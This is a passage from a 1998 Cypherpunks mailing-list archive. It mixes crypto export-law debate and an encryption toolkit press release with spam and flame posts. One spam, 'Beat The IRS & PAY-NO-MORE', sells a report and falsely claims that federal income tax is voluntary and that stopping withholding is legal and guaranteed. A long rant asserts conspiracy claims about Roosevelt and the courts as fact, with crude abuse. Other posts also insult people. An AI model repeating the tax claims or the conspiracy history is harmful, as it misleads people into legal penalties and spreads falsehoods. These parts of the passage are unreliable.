 in helping homeowners establish ONE easy LOW monthly
 payment with the added benefit of not needing any equity in your
 home.  American Capital is constantly working with other lenders
 throughout the U.S. to provide you with the best interest rate
 possible.  We have a number of different companies that we work
 with and this is at NO cost to you EVER.  We are simply a referral
 agency.

           As you may have seen in our ad you can be loaned up to
125% of the value of your home or $100,000.00 even if you have
NO equity in your home. There are no up-front or advanced fees of
any kind. You can be approved within 24 hours and have your cash
in one weeks time.

           In order for us to provide you with a FREE loan evaluation,
Please go to http://www.amesconsultants.com/ins/127.html



           Put us to the test... I know we can Help You.
Kindest Regards.




<FONT COLOR="#000000" BACK="#fffffe" SIZE=3>















<FONT COLOR="#000000" SIZE=3>
</PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Oswald / CEO / RPK Security Inc <joswald@rpkusa.com>
Date: Mon, 27 Jul 1998 18:35:04 -0700 (PDT)
Subject: Announcement: RPK Encryptonite Software Toolkit Version 3.0
Message-ID: <199807280128.SAA11164@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


You have received this message because at some time in the past your name was submitted to our e-mail mailing list database.  If you do not wish (or no longer wish) to receive announcements, updates and news concerning the RPK Encryptonite Engine or the RPK InvisiMail e-mail security products, please forward this message to remove@rpkusa.com

----------------------------------------------------------------------------------------------------------
FOR IMMEDIATE RELEASE

CONTACT
Paula Miller							Lyn Oswald
Nadel Phelan, Inc.						RPK Security, Inc.
408-439-5570 x277							212-488-9891
paulam@nadelphelan.com						lynoswald@rpkusa.com

RPK SECURITY ANNOUNCES "ENCRYPTONITE(tm)": THE POWERFUL PUBLIC KEY ENCRYPTION TOOLKIT

The RPK Encryptonite(tm) Software Toolkit Version 3.0 Allows Developers to Easily Add Strong Security to Internet, Software, Hardware and Communications Applications

SAN FRANCISCO, CA. July 27, 1998 - RPK Security, Inc., announced today the release of its RPK Encryptonite Software Toolkit version 3.0.  Now with C++ implementations and  a Delphi VCL component, the RPK Toolkit provides integrators, developers and engineers with everything they need to quickly and easily incorporate fast public key encryption and strong security into their applications without extensive knowledge of cryptography.  RPK Security is a technology leader in strong and fast public key encryption for software, hardware and Internet applications. With development and distribution facilities outside of the U.S., RPK Security is able to provide its customers with a worldwide strong security solution that is available globally unlike competing products that are restricted by U.S. export regulations.
	The RPK Toolkit, a software implementation of the RPK Encryptonite Engine, allows developers to build custom applications with embedded strong encryption for information sensitive applications and industries such as the Internet, communications, legal, health care and financial services. The Toolkit provides a dramatic 40 percent improvement in engine initialization (compared with V2.1), which results in remarkably better application response times. In addition, the Toolkit will include in future releases a new "packet encryption" technique which is well suited for broadcast and multi-cast applications, especially on the Internet.
	 The RPK Toolkit is easy to use and manage, making it an attractive and readily accessible solution for developers of new applications. The RPK Toolkit includes sample applications, complete source code and comprehensive documentation. The core technology of the RPK Toolkit leverages the same mathematics behind Diffie-Hellman Key Exchange, a widely used algorithm for creating secure network-based communications systems, and is highly respected by security experts. 
	
more

RPK RELEASES LATEST VERSION OF ENCRYPTONITE TOOLKIT	 PG. 2 OF 3


"I have reviewed the RPK public key cryptosystem and believe the algorithm to be secure and suitable for use in secure applications," said Fred Piper, cryptographer, Codes & Ciphers Ltd.
	The RPK Encryptonite Engine provides a method of encrypting (also known as encoding) computer data or digital electronic signals to protect its contents against unauthorized surveillance.  RPK Encryptonite Engine is unique in that it combines all the benefits of other public key systems (authentication, digital signatures and digital certificates) with the speed of a secret key system into one algorithm. With the superior performance offered by RPK's Encryptonite Engine, applications requiring streaming data, sound, video or large numbers of transactions, such as credit card payments, receive instantaneous responses and secure communication links.
	"In response to customer requests for a variety of software implementations as well as custom hardware (chips), we now offer developers and engineers a multi-platform premium encryption product that is easy to use and offers flexible and scalable levels of security and performance," said Jack Oswald, president and CEO of RPK Security. "Because the RPK Toolkit is developed outside of the U.S., it is not subject to U.S. export laws which gives a tremendous advantage to international customers, allowing them to produce secure, fast and flexible systems."

Features of RPK Encryptonite Software Toolkit 3.0:
Eighty different levels of encryption security 
Global availability with strong encryption
Faster encryption and decryption of data files and streams 
Based on proven mathematics of Diffie-Hellman Key Exchange algorithm
Easy to use object-oriented design
Extremely well suited to embedded applications
Less expensive to implement than competing products

	
more



RPK RELEASES LATEST VERSION OF ENCRYPTONITE TOOLKIT	 PG. 3 OF 3


Pricing and Availability:
	The RPK Encryptonite Software Toolkit is now available for licensing worldwide. Pricing starts at $695 per developer (development only). Deployment license fees are based upon custom configurations. For sales information, contact Kevin Shannon, vice president, sales at (610) 399-7999, or via e-mail at sales@rpkusa.com

The RPK Encryptonite Software Toolkit includes: highly portable, cross-platform, C++ class libraries with full source code for use with Win 95, 98, NT and Linux, and VCL component for Borland's Delphi 3.0/2.0 running under Microsoft Windows 95 and NT. It was compiled and tested with Microsoft's Visual C++, Borland C++ Builder,  gnu/g++ and Borland Delphi 2.0/3.0. Windows DLL and ActiveX will be available by August 15, 1998.  C source library, Solaris and HP/UX ports, and Java implementations will be available by August 31, 1998.

ABOUT RPK SECURITY
Founded in 1995, RPK Security, Inc. is a technology leader in fast public key cryptography.  Its flagship RPK Encryptonite(tm) Engine, a strong and uniquely fast public key encryption technology, is available worldwide in custom hardware and software toolkits on multiple platforms.  RPK solutions are ideal for electronic communications, financial transactions, Internet banking, smart cards, streaming audio-video, telecommunications and more. Developed from widely accepted security mathematics and techniques, the RPK Encryptonite Engine is easily embedded into new and existing hardware and software applications.  RPK's cryptographic research and product development is based in New Zealand, Switzerland and the U.K, with worldwide sales and marketing operations in San Francisco, CA.  Visit RPK's website at www.rpkusa.com or call (212) 488-9891.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Mon, 27 Jul 1998 18:46:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: John Gilmore and the Great Internet Snake Drive
In-Reply-To: <19980727141055.63396@songbird.com>
Message-ID: <19980727184320.50687@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, Jul 27, 1998 at 09:20:10PM -0400, mgraffam@mhv.net wrote:
> On Mon, 27 Jul 1998, Kent Crispin wrote:
> 
> > It occurs to me that an interesting use for the eff des cracker would
> > be the following: since the government asserts that DES is safe, then
> > a DES encrypted archive of crypto code should be exportable.
> 
> No. Encrypting with DES, or any symmetric cipher
> does not destroy the information, which is what is controlled.
> Even losing the key does not destroy the information, as we all know:
> keys can be recovered it is just a matter of the work involved.

Apparently we are talking at cross purposes.

Currently, there are rather large ftp crypto archives that are
"protected" by a scheme using randomly generated directory names. 
This is considered acceptable by the export authorities.  The export
authorities would have a hard time, therefore, arguing that an archive
protected by encrypting the files with DES would not be sufficiently
protected.

It would be a stunt, of course.  Merely another stunt to illustrate 
the inconsistencies in the export laws.

[...]
> We don't need encrypted archives floating around.. we need to show that,
> like cars, crypto devices (programs or otherwise!) are useful even if
> they can be used by bad people for bad purposes.
> 
> Abstract things like exporting a hunk of random crap and arguing about
> it don't achieve this, and will never do so in the minds of laymen
> with no real interest in crypto.

I quite disagree.  Frequently a clever stunt does engage the layman 
-- at least the intelligent laymen.

-- 
Kent Crispin, PAB Chair			"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Mon, 27 Jul 1998 12:02:43 -0700 (PDT)
To: "S. M. Halloran" <mitch@duzen.com.tr>
Subject: Re: FDR
In-Reply-To: <199807271446.RAA18652@ankara.192.168.3.5>
Message-ID: <Pine.BSF.3.96.980727172913.4156H-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Jul 1998, S. M. Halloran wrote:

>Actually, attila, or Linda, or whoever you are...you are right.
>
>I neglected to take into consideration that this attempt at revisionist 
>history of the greatest President of the US in the 20th Century, perhaps 
>in US history...
>
    are you really calling this cretinous, brain dead sorry excuse for a
    human being who was not worth being spat upon by the crippled camel of
    a third-world pepophilic dictator with poor table manners, the
    greatest President in our history? 

    man, you're one sick puppy.

    are we talking about the same President?  really? FDR? the man who
    sold our country into perpetual slavery on 08 Mar 33?  4 days after
    he was inaugerated in a speech where he "warned" he was asking for
    emergency powers, even stronger than war time powers?

    who managed to coerce a Congress, not even given a chance to read 
    what they were signing, into a declaration of national emergency 
    so this so called American could suspend the constitution, amend the 
    WWI "trading with the enemy" act so the citizens of what was once 
    the USA were also included among the  enemy...? who pledged -us- and
    all our property into the servitude of the  Federal Reserve and its 
    private owners, of which more than 50% is foreign?

    the same man who forfeited our good faith and credit to the bankers
    in bamkruptcy so the U.S. is now subject to Admiralty law and flies
    the gold fringed flag of martial law in all its courtrooms?

    the same man who inaugerated the Executive Order provision which gives
    the President and Secretary of the Treasury the power to rule without
    Congress?  and to enshrine the executive order into part of the US
    Code (USC 963, I believe)? 

    who contracted with the international bankers to print paper money as 
    Federal Reserve notes for which he owed the bankers the cash he had 
    just printed plus interest while they used the cash to buy the T-bills
    (the instrument of indebtedness)? --and confiscated private gold at
    $20 an Oz --later setting the standard at $34/Oz so the insiders made
    a killing? 

    the same man who tried to pack the Supreme Court? 

    the same man who  ran for a third term on an isolationist platform
    romising every mother that her sons would not fight a foreign war 
    then diplomatically left Japan no option but to go to war? 

    the same man who left Pearl Harbor out of loop with no code books for 
    the Red or Purple code so the defining act to start America in the war 
    wasted the Pacific Fleet with its ammo in the warehouses to be blown 
    up, 2,000+ dead, and battleships lying on the bottom? 

    the same man who violated the law and defied Congress with the 
    Lend-Lease program, gave away half of Europe to Russia, handed Russia 
    Berlin?  the same man whose two closest advisers were communists?  

    I always wanted to believe Alger Hiss was innocent as his son Tony 
    was in my class at Harvard --he wasnt innocent, nor were the Rosenbergs 
    as the CIA had cracked the code but would not show it in court --they 
    even knew who handed over the trigger mechanism (never punished and he 
    left the U.S. after the Manhattan project and taught for many years at 
    Oxford).

    yep, good Ol' Uncle Joe Stalin's best friend, along with bankers like
    Schiff who financed the Russians. 

    it's no conspiracy that Prescott Bush was complicite, but left holding 
    the bag. when the U.S. in '42 confiscated Union Bank which was started 
    by George's grandfather Herbert Walker -that's why George ran away from 
    home, joined the air corps and became a war hero at 18. why was the
    bank grabbed --Union was a front for A.G. Farber and for Hitler
    --Walker and his friends had been funding Hitler since the early 
    twenties --why? greed and power. 

    it's no conspiracy; it's history, in black and white Universal news 
    reels.  

    FDR, the incestuous son of bitch (Eleanor was is cousin) should have 
    been shot for treason --along with Eleanor. McCarthy, a scum-bag  if 
    there ever was one, was far closer to the truth than he ever knew.

    wake up and smell the roses! they've been fertilized by the shit of
    Eleanor Roosevelt for many years --she's still crapping in the White
    House garden for the first bitch to read the tea rose leaves.  

    there are no conspiracies, just men behaving like they always do; the
    vulture capitalists is that they only back off when their fear exceeds 
    their greed.  politicians arent smart enough to back off their greed 
    and their thirst for power as they blasphemously take take the oath 
    of office.


>this raving and ranting to take the name of FDR in 
>vain...this dribble to take all of humanity's name in vain...this project 
>to develop the Mother of All Conspiracy Theories, including figuring out a 
>way to show the Big Bang is/was, all of it, every last bit, a conspiracy...
>
    there are no conspiracies; it's nothing more than man fouling his own
    nest; the normal progression of history which no-one learns so they 
    repeat the same mistakes --the well-fed populace is too lazy to take
    an interest in their own government until it is too late.

    there is no left and right; there is no moral government; it's all
    about power and staying in power.  ever notice how reformers only
    stay reformers until they need to run for reelection and the money
    goes to those who play ball?

>...well, it could be ciphertext for which I have not received the key for 
>making into plaintext.  Someone please forward the key to me.
>
    what key? there is no key... except "mene, mene, tikel, upharrison" 
    (or whatever it was on the wall).  just open your eyes and view the 
    sewer around you. the fertilizer in the fields is now distributing
    "radioactive" waste --effluent courtesy of your politicians.

    the U.S. is already an oligarchy, next comes the plutocracy, followed
    by the triumvirate, and then the emporer (maybe with clothes) -then
    there will be a winnowing and anarchy followed by tribal states. welcome
    to history, but few will live to see it run its course --America, the
    universally hated, will be the first to be plowed under when she can
    no longer bully or buy the -pax americanus-. and the men in power know
    that a hungry disorganized populace can be subjugated by a well fed
    army.

>By the way, I'm really one of you guys.  I am just working a cover among 
>the people who call themselves sane until you guys who really know the 
>truth can get into a position reveal these eternal truths to the 
>unbelievers.  he-he!
>
>Really.
>
>[if you think you see a crazy person, consider the very real possibility 
>that what you are seeing is really a crazy person]
>

    sorry, I really am crazy, but it's better to be crazy than insane.

>
>Mitch Halloran
>Research (Bio)chemist
>Duzen Laboratories Group

    another Brit/American selling his ass to the world....

>Ankara   TURKEY
>mitch@duzen.com.tr
>
>An ass with a golden saddle is still an ass.   --Turkish proverb
>
    yeah, but he's a rich ass...

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Mon, 27 Jul 1998 13:05:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Spam Help
In-Reply-To: <199807271834.OAA16760@deathstar.comnet.ca>
Message-ID: <19980727200504.11080.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Jul 1998 14:35:05 -0400  "Your Yashy" <cons0005@*algonquinc.on.ca>
wrote:

>  I was wondering if I could get some help setting up a filter. I'd 
>liketo create a folder called "SPAM". Then all email that are in the 
>spam folder

For fuck sake.  If is isn't AOL, it is some of lame fuck asking for help
with filters.  Where do people get the idea that the toaderpunks can help
with all these problems?  We've had baseball signatures, lost people and
now some idiot who really wants the pegasus list or something <--hint


cypherpunkseeker









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JBrown4330@aol.com
Date: Mon, 27 Jul 1998 18:08:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Republicans
Message-ID: <ca7606ae.35bd2469@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey:  Who made up the term "Politically Correct"?  Not Christians and not
Republicans. Your side did.  How does wanting a smaller government, less
taxes, the freedom to CHOOSE to pray in schools, the rights of the un-born( of
course you probably think they have no rights- just as slave owners thought
about their slaves), and who acts like the thought police??????

                                                      CHOKE ON IT YOU
HYPOCRITE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Mon, 27 Jul 1998 18:32:55 -0700 (PDT)
To: Kent Crispin <kent@songbird.com>
Subject: Re: John Gilmore and the Great Internet Snake Drive
In-Reply-To: <19980727141055.63396@songbird.com>
Message-ID: <Pine.LNX.3.96.980727211127.13539A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Jul 1998, Kent Crispin wrote:

> It occurs to me that an interesting use for the eff des cracker would
> be the following: since the government asserts that DES is safe, then
> a DES encrypted archive of crypto code should be exportable.

No. Encrypting with DES, or any symmetric cipher
does not destroy the information, which is what is controlled.
Even losing the key does not destroy the information, as we all know:
keys can be recovered it is just a matter of the work involved.

Encrypting with an OTP is interesting at first .. but considering that
distributing a crypto archive or the completed works of Shakespeare
amount to the same thing after an OTP has been used, I am not convinced
it has much meaning.

The _spirit_ of the law is that no crypto device can be exported. Programs
are considered to be devices.. as is evidenced by the recent decision
in the Bernstein case.

We don't need encrypted archives floating around.. we need to show that,
like cars, crypto devices (programs or otherwise!) are useful even if
they can be used by bad people for bad purposes.

Abstract things like exporting a hunk of random crap and arguing about
it don't achieve this, and will never do so in the minds of laymen
with no real interest in crypto.

As for me, I prefer the position of my countryman, Henry David Thoreau ..
civil disobedience:

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
Be a munitions trafficker: http://www.dcs.ex.ac.uk/~aba/rsa/rsa-keygen.html

#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Mon, 27 Jul 1998 19:43:22 -0700 (PDT)
To: mgraffam@mhv.net
Subject: Re: John Gilmore and the Great Internet Snake Drive
In-Reply-To: <Pine.LNX.3.96.980727211127.13539A-100000@albert>
Message-ID: <199807280239.WAA01586@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.LNX.3.96.980727211127.13539A-100000@albert>, on 07/27/98 
   at 09:20 PM, mgraffam@mhv.net said:

>The _spirit_ of the law is that no crypto device can be exported.
>Programs are considered to be devices.. as is evidenced by the recent
>decision in the Bernstein case.

That was the Junger case. In the Bernstein case the principles of Free
Speach and the 1st Amendment were upheld by the 9th District court
(Patel).

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Windows done RIGHT!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNb07gY9Co1n+aLhhAQHstwQApoCNdr8viSr0BSNMz3UE3t2dMKeUTkL8
xGL3u5RQIk/5GQo68Rc+Tvftl/VNsPLoMZISpW6Lx5uPHQLS4zj6VlUaEvfNpc9J
eGba5PEEbQr7XS3/cqjyi2SfpVzihmgd5/808g8uonZK5B/9TAljt7XvIjmiD4Ku
HOoQW/2AAhY=
=D2K7
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 27 Jul 1998 12:46:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199807271945.VAA26183@replay.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Mon, 27 Jul 1998 19:54:56 -0700 (PDT)
To: "William H. Geiger III" <whgiii@openpgp.net>
Subject: Re: John Gilmore and the Great Internet Snake Drive
In-Reply-To: <199807280239.WAA01586@domains.invweb.net>
Message-ID: <Pine.LNX.3.96.980727223824.13719C-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Jul 1998, William H. Geiger III wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In <Pine.LNX.3.96.980727211127.13539A-100000@albert>, on 07/27/98 
>    at 09:20 PM, mgraffam@mhv.net said:
> 
> >The _spirit_ of the law is that no crypto device can be exported.
> >Programs are considered to be devices.. as is evidenced by the recent
> >decision in the Bernstein case.
> 
> That was the Junger case. In the Bernstein case the principles of Free
> Speach and the 1st Amendment were upheld by the 9th District court
> (Patel).

You're absolutably right. My bad.. I don't know what I was thinking.
I guess this shows my pessimissim and lack of trust in our establishment,
doesn't it :)

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
Be a munitions trafficker: http://www.dcs.ex.ac.uk/~aba/rsa/rsa-keygen.html

#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 28 Jul 1998 00:05:04 -0700 (PDT)
To: chrisharwig@hetnet.nl>
Subject: Re: Fw: my thoughts for this list
In-Reply-To: <MAPI.Id.0016.0072797a202020203030303430303034@MAPI.to.RFC822>
Message-ID: <3.0.5.32.19980727235810.00934840@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:19 PM 7/27/98 -0400, mgraffam@mhv.net wrote:

>GPG = GNU Privacy Guard.
>
>GPG is a PGP work-a-like .. doesn't support RSA (yet) due to the patents,
>but once they run out, GPG will use it. I think it uses Blowfish (and
>CAST?) for the symmetric algorithms, and probably 3DES too. I dunno
>about IDEA .. I have my doubts due to the patents. 

Actually, GPG has been a PGP-look-similar-but-not-interoperate-like
rather tha a workalike.  Unless GPG has been updated lately,
GPG keys tend to do Very Crashy Things to my PGP 5.5.x
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 29 Jul 1998 18:44:35 -0700 (PDT)
To: Babybee390@aol.com
Subject: Re: vinyl stickers
In-Reply-To: <57a0eea8.35bfcae7@aol.com>
Message-ID: <Pine.BSF.3.91.980728012126.7316D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



No, but we do offer clues. To qualify, you must memorize the 
cybernomicon, and help Tim find his shoes.

On Wed, 29 Jul 1998 Babybee390@aol.com wrote:

> do you have music vinyl stickers , if so , could i get them wholesale?
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: LookBelow@msn.com
Date: Tue, 28 Jul 1998 00:02:28 -0700 (PDT)
To: WiseFolk@yahoo.com
Subject: Beat The IRS & PAY-NO-MORE
Message-ID: <199807280624.BAA05367@sw.crfc.com>
MIME-Version: 1.0
Content-Type: text/plain




        ====================================================

                            - PLEASE READ -                     
                            ***************
   The Founding Fathers of The United States of America wrote our Con-
stitution, Bill of Rights and Declaration of Independence to set us FREE
from TYRANNY and TAXATION.

   Our Founding Fathers did not want our government to make you pay
INCOME TAXES. If you study the Constitution, and the IRS tax laws, you 
will find that paying income taxes is not mandatory.  It is based on a
voluntary system. The LAWS and the SUPREME COURT and the IRS have ruled 
that Federal income taxes are VOLUNTARY and FILING A RETURN IS NOT
REQUIRED in many cases if you properly VOLUNTEER OUT OF THE SYSTEM AND
THEIR JURISDICTION..

   "Our tax system is based on individual self assessment and 
      VOLUNTARY COMPLIANCE." - M. Caplin, IRS Commissioner

"OUR TAX SYSTEM IS BASED UPON VOLUNTARY ASSESSMENT AND PAYMENT AND NOT
ON DISTRAINT" -Supreme Court Ruling, Flora v. U.S., 362 U.S. 145

It is very EASY and LEGAL to volunteer out of the IRS tax system, but
you must know the EXACT PROCESS REQUIRED to do this simple task. If
you don't know the correct way to do this, you could be FINED $500 by
the IRS.

    If you will spend JUST $35.00 we will send you our report:
                  "BEAT THE IRS & PAY-NO-MORE".
             Our report will SET YOU FREE  LEGALLY!

After reading our report and filling out a simple form you will be
FREE from the IRS BANDITS and the graduated Federal INCOME TAX ...
FOREVER. Our report is guaranteed to STOP FEDERAL INCOME TAX 
WITHHOLDING from your pay check!!! You will never have to pay Federal
income taxes again. You will never have to file a 1040 Form again. You
will never have to keep personal expense or income records. You will
be completely FREE from the Federal income tax and the IRS. We send
you absolute PROOF you do not have to file a return.

After reading our report and following simple instructions your pay 
check will be free from those nasty income tax deductions. This will
put an extra $20 to $200 in your pocket every week!.

       "ISN'T IT ABOUT TIME YOU GET PAID WHAT YOUR WORTH?"

        Now is the time to fight back. Please read on!!!
         **********************************************

                  "BEAT-THE-IRS  & PAY-NO-MORE"

Our PACKAGE, (Beat The IRS & PAY-NO-MORE) will teach you EXACTLY how
to EASILY: STOP FEDERAL Income Tax Withholding, STOP April filing of
1040 Form, &  STOP THE IRS EXTORTION PERMANENTLY! This works for all
Citizens that are not government employes, don't deal in Alcohol,
Tobacco, or fire arms, or own a corporation or own a business where
you are under a duty to withold from your employes paycheck.
-------------------------------------------------------------------
The IRS Federal Income Tax System is based on VOLUNTARY COMPLIENCE...
We will teach you how to legally VOLUNTEER OUT OF THE SYSTEM!
-------------------------------------------------------------------
Your Success is ABSOLUTELY Unconditionally GUARANTEED! Our methods 
work every time for everybody if you were born in and live in one of
the 50 Republic States and are not a government employee.
Also you can not live or work on Government Property such as a Mili-
tary base, Washington, D.C., Guam, Semoa, Virgin Islands, etc. 
Our method is 100% legal,  honest and ethical. We will pay anybody 
$1,000 if they can  prove our method is ILLEGAL, DISHONEST or 
UNETHICAL!!! Our method has worked for every person who has ever 
bought this package without exception.

                    NOBODY HAS EVER FAILED!!!

- Our PACKAGE includes a LIFETIME, FREE, 40% PAY OUT Dealership, 
PLUS ALL the marketing material master copies you will ever need.
YOUR PAYCHECKS WILL BE 10% TO 35% BIGGER EVERY WEEK, within 2 weeks
of filing the proper forms and affidavit. WHY NOT GIVE YOURSELF A 
RAISE THIS YEAR BY EXERCISING AND ENJOYING MORE OF YOUR CONSTITU-
TIONAL RIGHTS. SET YOURSELF FREE!
-------------------------------------------------------------------
Your package includes unlimited FREE phone consultations, a copy
of the U.S. Constitution, The Bill of Rights, forms, affidavits,
and much,  much more!
--------------------- ORDER FORM - CUT ----------------------------

TO ORDER BY MAIL: Send this order form plus your Name, Address,
Phone # and a $35+$3 S&H  (Money Order Only) to:
LINKCO --Dept. # 00001 -- POB 66781 -- Phoenix, AZ 85082   
Phone: (602)267-9688

                  Thanks for reading this message!
               -(Unconditional Money Back Guarantee)- 
                     - Copyright 1996 Linkco -
==================================================================
To be REMOVED from this list type REMOVE in the subject area of
a new e-mail and send to:  Action944@usa.net
==================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sosechal@easynet.fr (laurent breton)
Date: Tue, 28 Jul 1998 01:25:55 -0700 (PDT)
Subject: Frozen shrimp and sole from senegal (west africa)
Message-ID: <199807280825.BAA14739@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Date : 28/July/98

FIND OFFER ON FROZEN SEAFOOD, SHRIMPS (PENAEUS DUORARUM) AND SOLES
(CYNOGLOSSUS) - ORIGINE SENEGAL (WEST AFRICA)
INVENTORY IN PARIS (FRANCE) - PRICES ARE FOB PARIS, OUR COLSTORE
WE CAN ALSO PRODUCE FOR YOU STARTING SEPT/98.

SHRIMPS
CREVETTES DECORTIQUEES CRUES-DEVEINEES-BLOCK-BOITES DE 2 KGS, MASTER 18 KGS)
PTO RAW - P&D - BLOCK - (MASTER 18KGS, 9 X 2 KGS BOXES)
140/180 KG - 60/80 LB	58.00 FF/KG	4,31$/LB
		
CREVETTES ENTIERES CUITES - (BOITES DE 2 KGS, MASTER 12 KGS)
SHRIMPS HEAD ON COOKED - (MASTER 12KGS, 6 X 2 KGS BOXES)
80/100/kg - 35/45/lb    39.00 FF/KG	2,90$/LB
100/120/kg - 45/55/lb   35.00 FF/KG	2,60$/LB
		
CREVETTES DECORTIQUEES CUITES-IQF-(12 SACHETS DE 0.500 KGS, MASTER 6 KGS)
SHRIMPS PUD COOKED IQF - (MASTER 6KGS, 12 X 0.5 KGS PLASTIC BAGS)
110/140 KG - 50/65 LB	57.00 FF/KG	4,24$/LB
140/180 KG - 65/80 LB	52.00 FF/KG	3,87$/LB
180/250 KG - 80/115 LB	47.00 FF/KG	3,49$/LB
250/300 KG - 115/135 LB	42.00 FF/KG	3,12$/LB
		
CREVETTES DECORTIQUEES CRUE - DEVEINEES - IQF
(12 SACHETS DE 0.5KGS, MASTER 6 KGS)
SHRIMPS PUD RAW IQF - (MASTER 15KGS, 30 X 0.5 KGS PLASTIC BAGS)
140/180 KG - 65/80 LB	67.00 FF/KG	4,98$/LB

POISSONS - FISH
FILET DE SOLE TROPICALE - (BOITES DE 2 KGS, MASTER 12 KGS)
TROPICAL SOLES FILETS - (MASTER 12KGS, 6 X 2 KGS BOXES)
60/90	       	        44.50 FF/KG	3,31$/LB
90/120	       	        45.50 FF/KG	3,38$/LB

FILET DE TURBOT TROPICAL - (BOITES DE 2 KGS, MASTER 12 KGS) L. NAME :
PSETTODES BELCHERI
TROPICAL TURBOT FILET - (MASTER 12KGS, 6 X 2 KGS BOXES)
80/160	      	         29.00 FF/KG	2,16$/LB

TURBOT TROPICAL H&G - (MASTER 22 KGS) L. NAME : PSETTODES BELCHERI - H&G
400/1500g	         10.00 FF/KG	0.75$/LB

SOLE PAC - (HEAD ON, PEELED CLEANED, IQF, IWP) - (MASTER 10 KGS)
175/225g                 31.00 FF/KG	2,30$/LB

SOLE PAN - (HEAD OFF, PEELED CLEANED, IQF, IWP) - (MASTER 10 KGS)
175/225g                 33.00 FF/KG	2,45$/LB

EN ESPERANT VOTRE INTERET

SALUTATIONS

email send by 
Mr Laurent Breton

SOSECHAL-CRUSTAGEL
RUE DU COMMERCE
ZIGUINCHOR - SENEGAL

FRENCH OFFICE
RUHLMANN SA
46 ALLEE ST. MALO, MAREE 132
94519 RUNGIS CEDEX
FRANCE
PHONE : 33 1 46 86 40 10
FAX#1 : 33 1 45 60 05 88
FAX#2 : 33 1 46 87 01 99
MOBILE : 33 6 80 84 77 08
E@MAIL : SOSECHAL@EASYNET.FR





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Tue, 28 Jul 1998 08:31:11 -0700 (PDT)
To: Jim Gillogly <cypherpunks@toad.com>
Subject: Re: FDR
In-Reply-To: <9807272025.AA16791@mentat.com>
Message-ID: <Pine.BSF.3.96.980728011751.5602B-100000@hun.org>
MIME-Version: 1.0
